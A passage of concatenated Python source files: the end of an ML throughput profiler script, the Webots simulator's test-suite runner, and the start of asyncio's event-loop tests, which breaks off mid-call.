self._worker_connections[worker_id].run(task,
worker_id)
worker_id_ptr += scale_factor
num_remaining_worker_ids -= scale_factor
# Move all previously un-schedulable tasks back to the queue.
while not unschedulable_queue.empty():
(task, scale_factor) = unschedulable_queue.get()
per_worker_type_task_queues[worker_type].put(
(task, scale_factor))
while not self._worker_queue.empty():
time.sleep(2)
done = True
for worker_type in per_worker_type_task_queues:
if not per_worker_type_task_queues[worker_type].empty():
done = False
break
self._reset_workers()
self._shutdown_workers()
def output(self, output_file):
"""Outputs the throughputs to a file in JSON format."""
# Make the output throughput keys a tuple of (model, scale_factor).
throughputs = {}
for worker_type in self._throughputs:
throughputs[worker_type] = {}
for job_type in self._throughputs[worker_type]:
key = str(utils.parse_job_type_str(job_type))
throughputs[worker_type][key] = {}
for other_job_type in self._throughputs[worker_type][job_type]:
if other_job_type is None:
other_key = None
else:
other_key = str(utils.parse_job_type_str(other_job_type))
throughputs[worker_type][key][other_key] =\
self._throughputs[worker_type][job_type][other_job_type]
with open(output_file, 'w') as f:
f.write(json.dumps(throughputs, indent=4))
def main(args):
if not args.isolated and not args.packed:
raise ValueError('At least one of "--isolated" or "--packed" '
'must be set')
# Pass the optional log file through so the --log_file flag is not silently ignored.
profiler = Profiler(args.num_workers, args.measurement_time, args.log_file)
profiler.profile(args.isolated, args.packed, args.distributed)
profiler.output(args.output_file)
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Measure throughputs')
parser.add_argument('-n', '--num_workers', type=int, required=True,
help='Number of workers')
parser.add_argument('-m', '--measurement_time', type=int, default=150,
help='Time per measurement in seconds')
parser.add_argument('-l', '--log_file', type=str, default=None,
help='Log file')
parser.add_argument('-i', '--isolated', action='store_true',
help='Measure isolated throughputs')
parser.add_argument('-p', '--packed', action='store_true',
help='Measure packed throughputs')
parser.add_argument('-d', '--distributed', action='store_true',
help='Measure distributed throughputs')
parser.add_argument('-o', '--output_file', type=str, required=True,
help='JSON output file for throughputs')
args = parser.parse_args()
main(args)
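# Example invocation (a sketch based on the argparse flags above; worker count,
# measurement time and output path are hypothetical):
#   python measure_throughput.py -n 4 -m 150 -i -p -d -o throughputs.json
# At least one of --isolated / --packed must be given, matching the check in main().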
|
test_suite.py
|
#!/usr/bin/env python
# Copyright 1996-2019 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test suite."""
import sys
import os
import shutil
import platform
import datetime
import getpass
import glob
import subprocess
import threading
import time
import multiprocessing
from command import Command
# monitor failures
failures = 0
# parse arguments
filesArguments = []
nomakeOption = False
ansiEscape = True
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
if arg == '--nomake':
nomakeOption = True
elif arg == '--no-ansi-escape':
ansiEscape = False
elif os.path.exists(arg):
filesArguments.append(arg)
else:
raise RuntimeError('Unknown option "' + arg + '"')
testGroups = ['api', 'physics', 'protos', 'parser', 'rendering']
# global files
testsFolderPath = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep
outputFilename = testsFolderPath + 'output.txt'
defaultProjectPath = testsFolderPath + 'default' + os.sep
supervisorControllerName = 'test_suite_supervisor'
protoFileNames = ['TestSuiteSupervisor.proto', 'TestSuiteEmitter.proto']
tempWorldCounterFilename = testsFolderPath + 'world_counter.txt'
webotsStdOutFilename = testsFolderPath + 'webots_stdout.txt'
webotsStdErrFilename = testsFolderPath + 'webots_stderr.txt'
# Webots setup (cf. setupWebots() below)
webotsFullPath = ''
webotsVersion = ''
def setupWebots():
"""Find webots binary thanks to WEBOTS_HOME."""
os.putenv('WEBOTS_TEST_SUITE', 'TRUE')
os.putenv('WEBOTS_EMPTY_PROJECT_PATH', defaultProjectPath)
global webotsFullPath
global webotsVersion
global webotsSysInfo
if sys.platform == 'win32':
webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + 'msys64' + \
os.sep + 'mingw64' + os.sep + 'bin' + os.sep + 'webots.exe'
else:
webotsBinary = 'webots'
if 'WEBOTS_HOME' in os.environ:
webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + webotsBinary
else:
webotsFullPath = '..' + os.sep + '..' + os.sep + webotsBinary
if not os.path.isfile(webotsFullPath):
print('Error: ' + webotsBinary + ' binary not found')
if sys.platform == 'win32':
sys.stdout.flush()
sys.exit(1)
webotsFullPath = os.path.normpath(webotsFullPath)
command = Command(webotsFullPath + ' --version')
command.run()
if command.returncode != 0:
raise RuntimeError('Error when getting the Webots version')
webotsVersion = command.output.replace('\n', ' ').split(' ')[2].split('.')
command = Command(webotsFullPath + ' --sysinfo')
command.run()
if command.returncode != 0:
raise RuntimeError('Error when getting the Webots information of the system')
webotsSysInfo = command.output.split('\n')
def findFirstWorldFilename(worldsFilename):
"""Get the first world file name."""
file = open(worldsFilename)
worldFilename = file.readline().strip()
file.close()
return worldFilename
def resetIndexFile(indexFilename):
"""Create the index file."""
file = open(indexFilename, 'w')
file.write('0\n')
file.close()
def formatString(s):
"""Add a predefined number of spaces after the ':' character."""
try:
index = s.index(': ')
s0 = '{:<20}'.format(s[0:index])
s0 += s[index:]
return s0
except ValueError: # can be thrown by string.index()
return s
def resetOutputFile():
"""Create the output file."""
file = open(outputFilename, 'w')
file.write(formatString('Webots binary: ' + webotsFullPath) + '\n')
file.write(formatString('Webots version: ' + str(webotsVersion)) + '\n')
file.write(formatString(
'Operating System: ' + platform.platform() +
' [' + platform.machine() + '] ' + platform.processor() +
' (' + platform.node() + ')') + '\n'
)
file.write(formatString('Date: ' + datetime.datetime.now().ctime()) + '\n')
file.write(formatString('Tester: ' + getpass.getuser()) + '\n')
for line in webotsSysInfo:
file.write(formatString(line) + '\n')
file.close()
def appendToOutputFile(txt):
"""Append txt to output file."""
file = open(outputFilename, 'a')
file.write(txt)
file.close()
def executeMake():
"""Execute 'make release' to ensure every controller/plugin is compiled."""
curdir = os.getcwd()
os.chdir(os.path.join(os.environ['WEBOTS_HOME'], 'tests'))
command = Command('make release -j%d' % multiprocessing.cpu_count())
command.run(silent=False)
os.chdir(curdir)
if command.returncode != 0:
raise RuntimeError('Error when executing the Make command')
def generateWorldsList(groupName, worldsFilename):
"""Generate the list of worlds to run."""
f = open(worldsFilename, 'w')
worldsCount = 0
# generate the list from the arguments
if filesArguments:
for file in filesArguments:
if file.startswith(groupName):
f.write(file + '\n')
worldsCount = len(filesArguments)
# generate the list from 'ls worlds/*.wbt'
else:
filenames = glob.glob(testsFolderPath + groupName + os.sep + 'worlds' + os.sep + '*.wbt')
# remove the generic name (iterate over a copy so removing entries is safe)
for filename in list(filenames):
if filename.endswith('test_suite'):
filenames.remove(filename)
# alphabetical order
filenames.sort()
# to file
for filename in filenames:
# speaker test not working on travis because of missing sound drivers
if not filename.endswith('_temp.wbt') and not ('TRAVIS' in os.environ and filename.endswith('speaker.wbt')):
f.write(filename + '\n')
worldsCount += 1
f.close()
return worldsCount
def monitorOutputFile(finalMessage):
"""Display the output file on the console."""
global monitorOutputCommand
monitorOutputCommand = Command('tail -f ' + outputFilename, ansiEscape)
monitorOutputCommand.run(expectedString=finalMessage, silent=False)
if not nomakeOption:
executeMake()
setupWebots()
resetOutputFile()
finalMessage = 'Test suite complete'
thread = threading.Thread(target=monitorOutputFile, args=[finalMessage])
thread.start()
webotsArguments = '--mode=fast --stdout --stderr --minimize --batch'
if sys.platform != 'win32':
webotsArguments += ' --no-sandbox'
for groupName in testGroups:
testFailed = False
appendToOutputFile('\n### ' + groupName + ' test\n\n')
# clear stdout and stderr files
open(webotsStdErrFilename, 'w').close()
open(webotsStdOutFilename, 'w').close()
worldsFilename = testsFolderPath + groupName + os.sep + 'worlds.txt'
indexFilename = testsFolderPath + groupName + os.sep + 'worlds_index.txt'
# init temporary world counter file
tempFile = open(tempWorldCounterFilename, 'w')
tempFile.write('0')
tempFile.close()
supervisorTargetDirectory = testsFolderPath + groupName + os.sep + 'controllers' + os.sep + \
supervisorControllerName
if not os.path.exists(supervisorTargetDirectory):
os.makedirs(supervisorTargetDirectory)
shutil.copyfile(
defaultProjectPath + 'controllers' + os.sep +
supervisorControllerName + os.sep +
supervisorControllerName + '.py',
supervisorTargetDirectory + os.sep + supervisorControllerName + '.py'
)
# parser tests use a slightly different Supervisor PROTO
protosTargetDirectory = testsFolderPath + groupName + os.sep + 'protos'
protosSourceDirectory = defaultProjectPath + 'protos' + os.sep
if not os.path.exists(protosTargetDirectory):
os.makedirs(protosTargetDirectory)
for protoFileName in protoFileNames:
shutil.copyfile(protosSourceDirectory + protoFileName,
protosTargetDirectory + os.sep + protoFileName)
worldsCount = generateWorldsList(groupName, worldsFilename)
firstSimulation = findFirstWorldFilename(worldsFilename)
if not os.path.exists(firstSimulation):
continue
resetIndexFile(indexFilename)
# Here is an example to run webots in gdb and display the stack
# when it crashes.
# This is particularly useful to debug on the Jenkins server.
# command = Command('gdb -ex run --args ' + webotsFullPath + '-bin ' +
# firstSimulation + ' --mode=fast --minimize')
# command.run(silent = False)
command = Command(webotsFullPath + ' ' + firstSimulation + ' ' + webotsArguments)
# redirect stdout and stderr to files
command.runTest(timeout=10 * 60) # 10 minutes
if command.isTimeout or command.returncode != 0:
if command.isTimeout:
failures += 1
appendToOutputFile(
'FAILURE: Webots has been terminated ' +
'by the test suite script\n')
else:
failures += 1
appendToOutputFile(
'FAILURE: Webots exits abnormally with this error code: ' +
str(command.returncode) + '\n')
testFailed = True
else:
# check count of executed worlds
tempFile = open(tempWorldCounterFilename)
counterString = tempFile.read()
tempFile.close()
if int(counterString) < worldsCount:
testFailed = True
appendToOutputFile('FAILURE: Some tests have not been executed\n')
appendToOutputFile('- expected number of worlds: %d\n' % (worldsCount))
appendToOutputFile('- number of worlds actually tested: %s\n' % (counterString))
else:
with open(webotsStdErrFilename, 'r') as file:
if 'Failure' in file.read():
failures += 1
if testFailed:
appendToOutputFile('\nWebots complete STDOUT log:\n')
with open(webotsStdOutFilename) as f:
for line in f:
appendToOutputFile(line)
appendToOutputFile('\nWebots complete STDERR log:\n')
with open(webotsStdErrFilename) as f:
for line in f:
appendToOutputFile(line)
if '(core dumped)' in line:
l = line[0:line.find(' Segmentation fault')]
pid = int(l[l.rfind(' ') + 1:])
core_dump_file = '/tmp/core_webots-bin.' + str(pid)
if os.path.exists(core_dump_file):
appendToOutputFile(subprocess.check_output([
'gdb', '--batch', '--quiet', '-ex', 'bt', '-ex',
'quit', '../bin/webots-bin', core_dump_file
]))
os.remove(core_dump_file)
else:
appendToOutputFile(
'Cannot get the core dump file: "%s" does not exist.' % core_dump_file
)
appendToOutputFile('\n' + finalMessage + '\n')
time.sleep(1)
if monitorOutputCommand.isRunning():
monitorOutputCommand.terminate(force=True)
with open(outputFilename, 'r') as file:
content = file.read()
failures += content.count('FAILURE ')
sys.exit(failures)
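# Example invocations (a sketch based on the argument parsing at the top of this
# script; the world file path is hypothetical and WEBOTS_HOME must be set):
#   python test_suite.py # build everything, then run all test groups
#   python test_suite.py --nomake api/worlds/some_test.wbt # skip make, run one world
# Any other argument must be an existing file path, otherwise a RuntimeError is raised.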
|
test_events.py
|
"""Tests for events.py."""
import pytest
import collections.abc
import concurrent.futures
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
import time
try:
monotime = time.monotonic
except AttributeError:
monotime = time.time
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
return loop.run_until_complete(doit())
finally:
loop.stop()
loop.close()
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = monotime()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = monotime()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
